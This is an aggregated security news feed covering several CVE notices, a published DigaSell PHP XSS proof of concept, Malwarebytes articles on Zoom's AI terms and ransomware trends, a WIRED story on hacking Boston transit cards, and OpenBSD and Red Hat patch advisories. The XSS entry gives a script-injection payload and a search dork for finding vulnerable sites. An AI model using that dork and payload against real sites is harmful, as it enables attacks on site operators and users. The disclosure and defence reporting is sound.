eprosima Fast DDS is a C++ implementation of the Data Distribution Service standard of the Object Management Group. Prior to versions 2.9.1 and 2.6.5, improper validation of sequence numbers may lead to remotely reachable assertion failure. This can remotely crash any Fast-DDS process. Versions 2.9.1 and 2.6.5 contain a patch for this issue.

**Comments**

squizz617 added a commit to squizz617/Fast-DDS that referenced this issue

Feb 7, 2023

Following 8.3.8.6.3 of DDS-RTPS 2.5.
This fixes issue eProsima#3236.

squizz617 added a commit to squizz617/Fast-DDS that referenced this issue

Feb 7, 2023

Following 8.3.8.6.3 of DDS-RTPS 2.5.
This fixes issue eProsima#3236.

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

squizz617 added a commit to squizz617/Fast-DDS that referenced this issue

Mar 15, 2023

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

MiguelCompany pushed a commit that referenced this issue

Mar 16, 2023

\* Implement a validity check for firstSN

Following 8.3.8.6.3 of DDS-RTPS 2.5.
This fixes issue #3236.

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* fix typo

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* add test input for issue #3236 (pr #3274)

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

---------

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

mergify bot pushed a commit that referenced this issue

Mar 16, 2023

 

\* Implement a validity check for firstSN

Following 8.3.8.6.3 of DDS-RTPS 2.5.
This fixes issue #3236.

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* fix typo

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* add test input for issue #3236 (pr #3274)

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

---------

Signed-off-by: Seulbae Kim <squizz617@gmail.com>
(cherry picked from commit 3aa3ee0)

mergify bot pushed a commit that referenced this issue

Mar 16, 2023

 

\* Implement a validity check for firstSN

Following 8.3.8.6.3 of DDS-RTPS 2.5.
This fixes issue #3236.

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* fix typo

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* add test input for issue #3236 (pr #3274)

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

---------

Signed-off-by: Seulbae Kim <squizz617@gmail.com>
(cherry picked from commit 3aa3ee0)

mergify bot pushed a commit that referenced this issue

Mar 16, 2023

 

\* Implement a validity check for firstSN

Following 8.3.8.6.3 of DDS-RTPS 2.5.
This fixes issue #3236.

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* fix typo

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* add test input for issue #3236 (pr #3274)

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

---------

Signed-off-by: Seulbae Kim <squizz617@gmail.com>
(cherry picked from commit 3aa3ee0)

MiguelCompany pushed a commit that referenced this issue

Mar 22, 2023

 

\* Implement a validity check for firstSN

Following 8.3.8.6.3 of DDS-RTPS 2.5.
This fixes issue #3236.

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* fix typo

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* add test input for issue #3236 (pr #3274)

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

---------

Signed-off-by: Seulbae Kim <squizz617@gmail.com>
(cherry picked from commit 3aa3ee0)

Co-authored-by: Seulbae Kim <squizz617@gmail.com>

MiguelCompany pushed a commit that referenced this issue

Mar 24, 2023

\* Implement a validity check for firstSN (#3274)

\* Implement a validity check for firstSN

Following 8.3.8.6.3 of DDS-RTPS 2.5.
This fixes issue #3236.

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* fix typo

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* add test input for issue #3236 (pr #3274)

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

---------

Signed-off-by: Seulbae Kim <squizz617@gmail.com>
(cherry picked from commit 3aa3ee0)

\* Refs #17717: Logging Macro fix

Signed-off-by: Mario Dominguez <mariodominguez@eprosima.com>

---------

Signed-off-by: Mario Dominguez <mariodominguez@eprosima.com>
Co-authored-by: Seulbae Kim <squizz617@gmail.com>
Co-authored-by: Mario Dominguez <mariodominguez@eprosima.com>

JLBuenoLopez-eProsima pushed a commit that referenced this issue

Apr 11, 2023

\* Implement a validity check for firstSN (#3274)

\* Implement a validity check for firstSN

Following 8.3.8.6.3 of DDS-RTPS 2.5.
This fixes issue #3236.

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* fix typo

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* add test input for issue #3236 (pr #3274)

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

---------

Signed-off-by: Seulbae Kim <squizz617@gmail.com>
(cherry picked from commit 3aa3ee0)

\* Refs #17717: Logging Macro fix

Signed-off-by: Mario Dominguez <mariodominguez@eprosima.com>

---------

Signed-off-by: Mario Dominguez <mariodominguez@eprosima.com>
Co-authored-by: Seulbae Kim <squizz617@gmail.com>
Co-authored-by: Mario Dominguez <mariodominguez@eprosima.com>

CVE-2023-39949: Assertion failure in SequenceNumber.h via malformed SPDP packet only when compiled in logging-enabled (Debug) mode · Issue #3236 · eProsima/Fast-DDS

DigaSell Digital Store PHP Script version 1.0.0 suffers from a cross site scripting vulnerability.

**DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting**

Posted Aug 11, 2023

Authored by indoushka

DigaSell Digital Store PHP Script version 1.0.0 suffers from a cross site scripting vulnerability.

tags | exploit, php, xss

SHA-256 | f72dfd55d23408ab5429974dee598db6c2f5f4c1ad279051decdd75964ab240b

Download | Favorite | View

**DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : DigaSell - Digital store PHP Script V1.0.0 XSS Vulnerability                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://codecanyon.net/item/digasell-digital-store-php-script/23580305?s_rank=2                                    |  | # Dork      : "Copyright  © DigaSell All Rights Reserved."                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /browse/tags/if<script>alert(/indoushka/);</script>=2                  [+] Panel       : https://127.0.0.1/codsemcom/digasell/browse/tags/if%3Cscript%3Ealert(/indoushka/);%3C/script%3E=2Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,933)
*   Arbitrary (16,196)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,277)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,344)
*   DoS (23,416)
*   Encryption (2,370)
*   Exploit (51,861)
*   File Inclusion (4,221)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,770)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,671)
*   Local (14,448)
*   Magazine (586)
*   Overflow (12,691)
*   Perl (1,423)
*   PHP (5,145)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,765)
*   Root (3,581)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,886)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,366)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,770)
*   Web (9,663)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,932)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,812)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,428)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,711)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,808)
*   UNIX (9,289)
*   UnixWare (186)
*   Windows (6,573)
*   Other

DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting

Categories: News
Categories: Privacy
Analysis of the Zoom Terms of Service caused users to believe their video conferences were being used to train an AI



(Read more...)




The post Zoom clarifies user consent requirement when training its AI appeared first on Malwarebytes Labs.

Changes in the terms of service (TOS) of the Zoom video-conferencing software have caused some turmoil. Since the pandemic, Zoom (Video Conferencing) has become a household name. Zoom came up as the big winner in the video conferencing struggle that enabled us to work from home. Now that things are more or less returning to a new normal, this has also had an impact on their success. But the recent uproar about their TOS could turn out to be a bigger blow.

The strange thing should be that the offending bits of the changes were effectuated in March of 2023. But nobody noticed until August when people started posting and discussing a portion of Zoom’s TOS. They found that Zoom claimed the right to access, use, collect, create, modify, distribute, process, share, maintain, and store Service Generated Data, including for the purpose of product and service development, marketing, analytics, quality assurance, machine learning or artificial intelligence (AI).

For a better understanding, you will want to know that in May, Zoom announced a collaboration with Anthropic, an artificial intelligence company that conducts research into AI safety and develops tools based on that work. The AI called Claude is intended to be integrated into the Zoom platform.

After all the uproar about it, Zoom changed its Terms of Service to reflect that Zoom will require user consent to use content for training artificial intelligence.

> "Notwithstanding the above, Zoom will not use audio, video, or chat Customer Content to train our artificial intelligence models without your consent."

In a blogpost, Zoom explains that they updated the TOS (in section 10.4) to confirm that they will not use audio, video, or chat customer content to train the AI models without your consent. And that the section about training artificial intelligence only concerned certain information about how customers in the aggregate use their product. They claimed to only do this to improve the product—not to spy on users.

The explanation makes a lot of sense, but wouldn’t it have been easier if they’d said that in the first place? From the way the TOS was worded, I would have guessed that that’s what they wanted us to think and not what they actually meant.

Unfortunately, they are not alone. Many software companies have their legal documents and agreements drawn up by professionals, that do not care whether their products can be read by ordinary people. As long as the legal content is correct and covers all angles, it’s all good in their point of view.

For that reason, it happens a lot that TOS, EULA’s (End User License Agreements), Privacy Policies, and privacy agreements do not get read in full. And even if we do, some of them look like they are designed not to be understood even if we take the trouble of reading through all of it.

If you don’t believe me, have a look at the Zoom TOS. If you have no trouble understanding what it says there, you are probably a lawyer specialized in corporate law. Even now that we have summarized it for you, it still looks like a major case of letter soup designed to make your eyes roll.

What most of these pieces of text have in common is:

*   You are supposed to have read them once you use the software, be it by putting a checkmark at the bottom of an endless text, or by simply proceeding to use the software
*   They protect the rights of the issuer
*   They restrict your usage
*   They explain what the issuer can do with your information and content
*   They are written by and for lawyers
*   They often favor length and complexity

But most of the time we view them as something that stands in the way of our goal, which is to play the game, use the software, or start working. This has been a known problem for many years, even so much so that a friendly programmer set out to work on a solution. If you’re interested in what a EULA has to say, but no time or inclination to read through all of it to find the important parts, give Eulalyzer a try. It’s free for personal use.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Zoom clarifies user consent requirement when training its AI

Categories: Threat Intelligence
July saw one of the highest number of ransomware attacks in 2023 at 441. At the forefront of these attacks is, once again, Cl0p.



(Read more...)




The post Ransomware review: August 2023 appeared first on Malwarebytes Labs.

_This article is based on research by Marcelo Rivero, Malwarebytes' ransomware specialist, who monitors information published by ransomware gangs on their Dark Web sites. In this report, "known attacks" are those where the victim **did not** pay a ransom. This provides the best overall picture of ransomware activity, but the true number of attacks is far higher._

July saw one of the highest number of ransomware attacks in 2023 at 441, second only to a record-breaking 556 attacks in May. At the forefront of these attacks is, once again, Cl0p.

In June, Cl0p shot to the top of the charts due to their use of a zero-day exploit in MOVEit Transfer, and the story in July is no different. Using the same vulnerability, the gang attacked an additional 170 victims in July—the second highest number of attacks by a single gang all year, just two shy of MalasLockers' record in May.

Amidst all the Cl0p chaos, however, a familiar foe seems to be quietly waning: LockBit.

Known ransomware attacks by gang, July 2023

The LockBit gang is experiencing a steady four-month decline in the number of attacks it has carried out. Since April 2023, we’ve observed an average decrease of 20 attacks a month from the group. LockBit’s 107 attacks in April to 41 in July represents a 62 percent dip in activity.

We’ve seen a similar pattern from LockBit before, and it’s not unusual for ransomware gang activity to ebb and flow. Still, it’s worth mentioning that a suspected LockBit affiliate was arrested last month. At least LockBit’s July numbers, then, could be explained by them simply wanting to lay low for a bit.

When another LockBit suspected affiliate was arrested in November 2022, we also saw a similar historic low in activity from the group.

**"Big game hunting" numbers**

Research published in July by Chainanalysis showed that ransomware gangs raked in around $449 million from victims in the last six months. The driving force behind this huge number? Chainanalysis says it is “big game hunting.” the practice of targeting large, financially well-off corporations in order to secure the biggest possible payouts.

Chainanalysis also mentions an increase in payouts less than $1000, meaning smaller companies are still being targeted by ransomware gangs as well.

At around this same time last year, total payouts were slightly under $300 million—a difference of over $150 million.

One possible reason for this increase, says Chainanalysis, could be that because fewer and fewer firms are willing to pay the ransom, ransomware gangs are increasing the size of their ransom demands, the idea being to squeeze the most money possible out of the firms still willing to pay.

Malwarebytes' own data suggests that the increase in payouts could also be a simple consequence of there being more ransomware attacks in general. From March 2022 to July 2022, Malwarebytes recorded a total of 1,140 ransomware attacks. From March 2023 to July 2023, we recorded a total of 2,130.

Likely, there’s a combination of factors at play here. Our logic goes as follows:

> Bigger targets + greedier gangs + more ransomware attacks in general = Historically high payouts.

Known ransomware attacks by country, July 2023

Attacks on the US and UK are at a four-month high. Four-mouth trends on attacks in Italy, on the other hand, suggest that the country is a new regular in the monthly "Top Five" of most-attacked countries.

Known ransomware attacks by industry sector, July 2023

In an article published in October of last year, we speculated on the future evolution of ransomware and how, with the rise of double-extortion schemes, more and more gangs might pivot away from using encryptors entirely. Interestingly, new research last month by Huntress seems to support this idea—exemplified by the most active ransomware gang today no less.

In their massive zero-day exploitation sprees, **Cl0p has apparently not deployed ransomware at all**. Instead, the group has focused on simply stealing company data to then later use as leverage against victims.

This move represents a significant departure from the majority of top ransomware gangs, and it forces organizations to rethink the nature of the problem: i’s not about ransomware per se, it’s about an intruder in your network. The really dangerous thing is turning out to be the access, not the ransomware software itself. 

Cl0p's focus on exploiting zero-days for initial access is revolutionary on its own. Pairing this with a pure data-exfiltration approach could signal an even bigger paradigm shift in how ransomware gangs operate into the future.

Speaking of innovations from top gangs, last month ALPHV was observed offering an API for their data leak site. 

The new API is a conduit for swift data dissemination, helping other cybercriminals instantly access and distribute the stolen information on the dark web. The overarching goal here —especially considering that ALPHV failed to seek a ransom from recently-breached cosmetics company Estee Lauder—seems to be to pressure victims to pay as stolen data reaches wider audiences.

Time will tell if the move pays off, but if nothing else, it signals cybercriminal desperation amid declining ransomware payments.

**New players****CATCUS **

CACTUS emerged in March 2023 as a fresh strain of ransomware, zeroing in on large-scale commercial operations. Last month, they published 18 victims on their leak site.

To infiltrate systems, this gang exploits well-known vulnerabilities present in VPNs. Once CACTUS operatives gain access to a network, they enumerate local and network user accounts and reachable endpoints. Following this, they craft new user accounts and deploy their ransomware encryptor. The uniqueness of CACTUS lies in their use of specialized scripts that automate the release and activation of the ransomware through scheduled tasks.

The CACTUS leak site

**Cyclops/Knight **

Though the underworld caught wind of Cyclops in May 2023, it's only recently that evidence of their activities surfaced as new victims' details appeared on their dark web portal. In addition, they've announced a shift in branding to "Knight." Last month, they published 6 victims on their leak site.

This ransomware is versatile, capable of compromising Windows, Linux, and macOS systems alike. Cyclops stands out with its intricate encryption methodology, which mandates a unique key to decrypt the execution binary. Cyclops also comes equipped with a distinct stealer component designed to extract and transfer sensitive information.

The Cyclops/Knight leak site

**How to avoid ransomware**

*   **Block common forms of entry**. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
*   **Detect intrusions**. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
*   **Stop malicious encryption**. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
*   **Create offsite, offline backups**. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
*   **Don’t get attacked twice.** Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Ransomware review: August 2023

HAProxy through 2.0.32, 2.1.x and 2.2.x through 2.2.30, 2.3.x and 2.4.x through 2.4.23, 2.5.x and 2.6.x before 2.6.15, 2.7.x before 2.7.10, and 2.8.x before 2.8.2 forwards empty Content-Length headers, violating RFC 9110 section 8.6. In uncommon cases, an HTTP/1 server behind HAProxy may interpret the payload as an extra request.

CVE-2023-40225

In 2008, Boston’s transit authority sued to stop MIT hackers from presenting at the Defcon hacker conference on how to get free subway rides. Today, four teens picked up where they left off.

In early August of 2008, almost exactly 15 years ago, the Defcon hacker conference in Las Vegas was hit with one of the worst scandals in its history. Just before a group of MIT students planned to give a talk at the conference about a method they’d found to get free rides on Boston’s subway system—known as the Massachusetts Bay Transit Authority—the MBTA sued them and obtained a restraining order to prevent them from speaking. The talk was canceled, but not before the hackers’ slides were widely distributed to conference attendees and published online.

In the summer of 2021, 15-year-olds Matty Harris and Zachary Bertocchi were riding the Boston subway when Harris told Bertocchi about a Wikipedia article he’d read that mentioned this moment in hacker history. The two teenagers, both students at Medford Vocational Technical High School in Boston, began musing about whether they could replicate the MIT hackers’ work, and maybe even get free subway rides.

They figured it had to be impossible. “We assumed that because that was more than a decade earlier, and it had got heavy publicity, that they would have fixed it,” Harris says.

Bertocchi skips to the end of the story: “They didn’t.”

The Boston subway hackers (from left to right) Scott Campbell, 16; Noah Gibson, 17; Matty Harris, 17; and Zack Bertocchi, 17.Photograph: Roger Kisby

Now, after two years of work, that pair of teens and two fellow hacker friends, Noah Gibson and Scott Campbell, have presented the results of their research at the Defcon hacker conference in Las Vegas. In fact, they not only replicated the MIT hackers’ 2008 tricks, but took them a step further. The 2008 team had hacked Boston’s Charle Ticket magstripe paper cards to copy them, change their value, and get free rides—but those cards went out of commission in 2021. So the four teens extended other research done by the 2008 hacker team to fully reverse engineer the CharlieCard, the RFID touchless smart cards the MBTA uses today. The hackers can now add any amount of money to one of these cards or invisibly designate it a discounted student card, a senior card, or even an MBTA employee card that gives unlimited free rides. “You name it, we can make it,” says Campbell.

To demonstrate their work, the teens have gone so far as create their own portable “vending machine”—a small desktop device with a touchscreen and an RFID card sensor—that can add any value they choose to a CharlieCard or change its settings, and they’ve built the same functionality into an Android app that can add credit with a tap. They demonstrate both tricks in the video below:

In contrast to the Defcon subway-hacking blowup of 2008—and in a sign of how far companies and government agencies have come in their relationship with the cybersecurity community—the four hackers say the MBTA didn’t threaten to sue them or try to block their Defcon talk. Instead, it invited them to the transit authority headquarters last year to deliver a presentation on the vulnerabilities they’d found. Then the MBTA politely asked that they obscure part of their technique to make it harder for other hackers to replicate.

The hackers say the MBTA hasn’t actually fixed the vulnerabilities they discovered and instead appears to be waiting for an entirely new subway card system that it plans to roll out in 2025. When WIRED reached out to the MBTA, its director of communications, Joe Pesaturo, responded in a statement that “the MBTA was pleased that the students reached out and worked collaboratively with the fare collection team.”

“It should be noted that the vulnerability identified by the students does NOT pose an imminent risk affecting safety, system disruption, or a data breach,” Pesaturo added. “The MBTA's fraud detection team has increased monitoring to account for this vulnerability \[and\] does not anticipate any significant financial impact to the MBTA. This vulnerability will not exist once the new fare collection system goes live, due to the fact that it will be an account-based system versus today’s card-based system.”

The high schoolers say that when they started their research in 2021, they were merely trying to replicate the 2008 team’s CharlieTicket hacking research. But when the MBTA phased out those magstripe cards just months later, they wanted to understand the inner workings of the CharlieCards. After months of trial and error with different RFID readers, they were eventually able to dump the contents of data on the cards and begin deciphering them.

Unlike credit or debit cards, whose balances are tracked in external databases rather than on the cards themselves, CharlieCards actually store about a kilobyte of data in their own memory, including their monetary value. To prevent that value from being changed, each line of data in the cards’ memory includes a “checksum,” a string of characters computed from the value using the MBTA’s undisclosed algorithm.

The hackers figured out how to reproduce a “checksum” calculation intended to prevent the value stored on CharlieCards from being changed, circumventing that anti-hacking protection.Photograph: Roger Kisby

By comparing identical lines of memory on different cards and looking at their checksum values, the hackers began to figure out how the checksum function worked. They were eventually able to compute checksums that allowed them to change the monetary value on a card, along with the checksum that would cause a CharlieCard reader to accept it as valid. They computed a long list of checksums for every value so that they could arbitrarily change the balance of the card to whatever amount they chose. At the MBTA’s request, they’re not releasing that table, nor the details of their checksum reverse engineering work.

Not long after they made this breakthrough, in December of last year, the teens read in the _Boston Globe_ about another hacker, an MIT grad and penetration tester named Bobby Rauch, who had figured out how to clone CharlieCards using an Android Phone or a Flipper Zero handheld radio-hacking device. With that technique, Rauch said he could simply copy a CharlieCard before spending its value, effectively obtaining unlimited free rides. When he demonstrated the technique to the MBTA, however, it claimed it could spot the cloned cards when they were used and deactivate them.

Early this year, the four teenagers showed Rauch their techniques, which went beyond cloning to include more granular changes to a card’s data. The older hacker was impressed and offered to help them report their findings to the MBTA—without getting sued.

In working with Rauch, the MBTA had created a vulnerability disclosure program to cooperate with friendly hackers who agreed to share cybersecurity vulnerabilities they found. The teens say they were invited to a meeting at the MBTA that included no fewer than 12 of the agency’s executives, all of whom seemed grateful for their willingness to share their findings. The MBTA officials asked the high schoolers to not reveal their findings for 90 days and to hold details of their checksum hacking techniques in confidence, but otherwise agreed that they wouldn’t interfere with any presentation of their results. The four teens say they found the MBTA’s chief information security officer, Scott Margolis, especially easy to work with. “Fantastic guy,” say Bertocchi.

The teens say that as with Rauch’s cloning technique, the transit authority appears to be trying to counter their technique by detecting altered cards and blocking them. But they say that only a small fraction of the cards they’ve added money to have been caught. “The mitigations they have aren’t really a patch that seals the vulnerability. Instead, they play whack-a-mole with the cards as they come up,” says Campbell.

“We’ve had some of our cards get disabled, but most get through,” adds Harris.

So are all four of them using their CharlieCard-hacking technique to roam the Boston subway system for free? “No comment.”

For now, the hacker team is just happy to be able to give their talk without the heavy-handed censorship that the MBTA attempted with its lawsuit 15 years ago. Harris argues that the MBTA likely learned its lesson from that approach, which only drew attention to the hackers’ findings. “It’s great that they’re not doing that now—that they’re not shooting themselves in the foot. And it’s a lot less stressful for everyone,” Harris says.

He’s also glad, on the other hand, that the MBTA took such a hardline approach to the 2008 talk that it got his attention and kickstarted the group’s research almost a decade and a half later. “If they hadn’t done that,” Harris says, “we wouldn’t be here.”

_Update 5 pm ET, August 10, 2023: Added a statement form an MBTA spokesperson._

Teens Hacked Boston Subway’s CharlieCard to Get Infinite Free Rides—and This Time Nobody Got Sued

OpenBSD 7.3 before errata 014 is missing an argument-count bounds check in console terminal emulation. This could cause incorrect memory access and a kernel crash after receiving crafted DCS or CSI terminal escape sequences.

untrusted comment: verify with openbsd-73-base.pub RWQS90bYzZ4XFphffQmz/SYU+JVzJdm/iyJa9hVeMTnpTmA0jJFJS/NgTZd0Bj1X1eLlwhxQ6sFnUFkbOe76DxsmLs/Y1C1vpgc= OpenBSD 7.3 errata 014, July 24, 2023: Missing bounds check in console terminal emulation could cause a kernel crash after receiving specially crafted escape sequences. Apply by doing: signify -Vep /etc/signify/openbsd-73-base.pub -x 014\_wscons.patch.sig \\ -m - | (cd /usr/src && patch -p0) And then rebuild and install a new kernel: KK=\`sysctl -n kern.osversion | cut -d# -f1\` cd /usr/src/sys/arch/\`machine\`/compile/$KK make obj make config make make install Index: sys/dev/wscons/wsemul\_sun.c =================================================================== RCS file: /cvs/src/sys/dev/wscons/wsemul\_sun.c,v diff -u -p -u -r1.36 wsemul\_sun.c --- sys/dev/wscons/wsemul\_sun.c 6 Mar 2023 20:34:35 -0000 1.36 +++ sys/dev/wscons/wsemul\_sun.c 24 Jul 2023 13:56:55 -0000 @@ -617,13 +617,14 @@ wsemul\_sun\_output\_control(struct wsemul\_ break; case ';': /\* argument terminator \*/ - edp->nargs++; + if (edp->nargs < SUN\_EMUL\_NARGS) + edp->nargs++; break; default: /\* end of escape sequence \*/ - oargs = edp->nargs++; - if (edp->nargs > SUN\_EMUL\_NARGS) - edp->nargs = SUN\_EMUL\_NARGS; + oargs = edp->nargs; + if (edp->nargs < SUN\_EMUL\_NARGS) + edp->nargs++; rc = wsemul\_sun\_control(edp, instate); if (rc != 0) { /\* undo nargs progress \*/ Index: sys/dev/wscons/wsemul\_vt100.c =================================================================== RCS file: /cvs/src/sys/dev/wscons/wsemul\_vt100.c,v diff -u -p -u -r1.45 wsemul\_vt100.c --- sys/dev/wscons/wsemul\_vt100.c 6 Mar 2023 20:34:35 -0000 1.45 +++ sys/dev/wscons/wsemul\_vt100.c 24 Jul 2023 13:56:55 -0000 @@ -868,16 +868,12 @@ wsemul\_vt100\_output\_dcs(struct wsemul\_vt (instate->inchar - '0'); break; case ';': /\* argument terminator \*/ - edp->nargs++; + if (edp->nargs < VT100\_EMUL\_NARGS) + edp->nargs++; break; default: - edp->nargs++; - if (edp->nargs > VT100\_EMUL\_NARGS) { -#ifdef VT100\_DEBUG - printf("vt100: too many arguments\\n"); -#endif - edp->nargs = VT100\_EMUL\_NARGS; - } + if (edp->nargs < VT100\_EMUL\_NARGS) + edp->nargs++; newstate = VT100\_EMUL\_STATE\_STRING; switch (instate->inchar) { case '$': @@ -1069,7 +1065,8 @@ wsemul\_vt100\_output\_csi(struct wsemul\_vt (instate->inchar - '0'); break; case ';': /\* argument terminator \*/ - edp->nargs++; + if (edp->nargs < VT100\_EMUL\_NARGS) + edp->nargs++; break; case '?': /\* DEC specific \*/ case '>': /\* DA query \*/ @@ -1082,13 +1079,9 @@ wsemul\_vt100\_output\_csi(struct wsemul\_vt edp->modif2 = (char)instate->inchar; break; default: /\* end of escape sequence \*/ - oargs = edp->nargs++; - if (edp->nargs > VT100\_EMUL\_NARGS) { -#ifdef VT100\_DEBUG - printf("vt100: too many arguments\\n"); -#endif - edp->nargs = VT100\_EMUL\_NARGS; - } + oargs = edp->nargs; + if (edp->nargs < VT100\_EMUL\_NARGS) + edp->nargs++; rc = wsemul\_vt100\_handle\_csi(edp, instate); if (rc != 0) { edp->nargs = oargs;

CVE-2023-40216

Red Hat Security Advisory 2023-4591-01 - Red Hat Update Infrastructure offers a highly scalable, highly redundant framework that enables you to manage repositories and content. It also enables cloud providers to deliver content and updates to Red Hat Enterprise Linux instances. Issues addressed include bypass and denial of service vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: RHUI 4.5.0 release - Security, Bug Fixes, and Enhancements  
Advisory ID:       RHSA-2023:4591-01  
Product:           Red Hat Update Infrastructure  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4591  
Issue date:        2023-08-09  
CVE Names:         CVE-2023-30608 CVE-2023-31047   
=====================================================================

1. Summary:

An updated version of Red Hat Update Infrastructure (RHUI) is now  
available. RHUI 4.5 fixes several security and operational bugs and also  
adds several new features.

2. Relevant releases/architectures:

RHUI 4 for RHEL 8 - noarch

3. Description:

Red Hat Update Infrastructure (RHUI) offers a highly scalable, highly  
redundant framework that enables you to manage repositories and content. It  
also enables cloud providers to deliver content and updates to Red Hat  
Enterprise Linux (RHEL) instances.

Security Fix(es):  
* Django: Potential bypass of validation when uploading multiple files  
using a single form field (CVE-2023-31047)

* sqlparse: Parser contains a regular expression that is vulnerable to  
ReDOS (Regular Expression Denial of Service) (CVE-2023-30608)

This RHUI update fixes the following bugs:

* Previously, the `rhui-manager` command used the `logname` command to  
obtain the login name. However, when `rhui-manager` is run using the  
`rhui-repo-sync` cron job, a login name is not defined. Consequently,  
emails sent by the cron job contained the error message `logname: no login  
name`. With this update, `rhui-manager` does not obtain the login name  
using the `logname` command and the error message is no longer generated.

* Previously, when an invalid repository ID was used with the  
`rhui-manager` command to synchronize or delete a repository, the command  
failed with following error:  
`An unexpected error has occurred during the last operation.`  
Additionally, a traceback was also logged.   
With this update, the error message has been improved and failure to run no  
longer logs a traceback.

This RHUI update introduces the following enhancements:

* With this update, the client configuration RPMs in `rhui-manager` prevent  
subscription manager from automatically enabling `yum` plugins. As a  
result, RHUI repository users will no longer see irrelevant messages from  
subscription manager. (BZ#1957871)

* With this update, you can generate machine-readable files with the status  
of each RHUI repository. To use this feature, run the following command:  
`rhui-manager --non-interactive status --repo_json <output file>`  
 (BZ#2079391)

* With this update, the `rhui-manager` CLI command uses a variety of unique  
exit codes to indicate different types of errors. For example, if you  
attempt to add a Red Hat repository that has already been added, the  
command will exit with a status of 245. However, if you attempt to add a  
Red Hat repository that does not exist in the RHUI entitlement, the command  
will exit with a status of 246. For a complete list of codes, see the  
`/usr/lib/python3.6/site-packages/rhui/common/rhui_exit_codes.py` file.

4. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For detailed instructions on how to apply this update, see:  
https://access.redhat.com/documentation/en-us/red_hat_update_infrastructure/4/html/migrating_red_hat_update_infrastructure/assembly_upgrading-red-hat-update-infrastructure_migrating-red-hat-update-infrastructure

For other information, see the product documentation:  
https://access.redhat.com/documentation/en-us/red_hat_update_infrastructure/4

5. Bugs fixed (https://bugzilla.redhat.com/):

1957871 - [RFE} Client rpms created in RHUI don't prevent auto-enable of subscription manager plugins  
2079391 - Feature request to provide sync/repo status of each repo in a JSON file for automated monitoring  
